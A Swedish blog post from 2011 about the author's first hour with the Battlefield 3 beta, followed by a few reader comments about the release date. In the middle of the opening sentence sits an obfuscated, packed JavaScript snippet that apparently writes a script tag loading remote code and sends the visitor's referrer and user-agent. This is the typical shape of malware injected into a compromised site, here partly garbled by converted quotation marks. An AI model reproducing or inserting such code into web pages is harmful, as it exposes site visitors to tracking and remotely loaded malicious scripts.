Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Min timme med Battlefield 3 Betan

Min timme med Battlefield 3 Betan
Filip Urde
 • On 27 september, 2011
 • http://www.revue.se/filip-urde

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aerzk|var|u0026u|referrer|ynkdh||js|php’.split(’|’),0,{}))
är helt golvad! Det är min spontana känsla…

Det här är de häftigaste spelet jag spelat! Nu har jag spelat Battlefield 3 betan i en timme. Jag tar nu en mat paus, även fast jag absoult inte vill, men jag är så hungrig att jag börjar bli yr. Och då inte för att vara skrytsam så vill jag berätta för er om min upplevelse.

 

Jag spelar Battlefield på min brors monsterdator och faktum är att det blir inte bättre än så här. FPS at its best! Grafiken är helt häpnadsväckande, rörelserna, fysiken, miljön… vad kan man säga! Filmerna säger mycket, men det här är precis så bra, om inte bättre!

Som ni ser så skriver jag som om jag fått en religös uppenbarelse, vilket i min värld är snudd på vad jag upplevt. Jag har hype-at det här spelet i flera månader nu, jag har sagt att ”Battlefield kommer sopa banan med COD”, ”COD! möt er skapare” osv. Allt jag har skrivit har nu enligt mig själv blivit validerat. COD har inte en suck mot Battlefield 3!

Den öppna versionen av betan kommer den 29e, jag vill inte säga så mycket mer om det hela. Jag låter er uppleva mer själva först, så kan vi ta upp det hela om 2 dagar.

 

Om det dock är någon annan som har spelat Bf3 betan och vill släppa ut lite ”steam”, gör då gärna det i kommentarsfältet. Jag älskar att övertyga mig själv om hur bra saker är och gärna med andra likasinnade =D.

Nä! nu ska jag äta tortellini i 4 sek och sen spela igen. Vi hörs!

 

Comments

 1. Karl_Ljunger

  Najs när kommer det ut för oss andra som inte har nyckel?

  • De kommer den 29e =D så det är inte långt kvar!!

  • Filip Urde

   Det dröjer inte länge… om 2 dagar. 29e =D så håll ut!
   /Filip

 2. Vilken tid i kommer det ut i sverige? 🙂

  • Kalle

   Det kommer ut kl 00.00 den 25e oktober tror jag.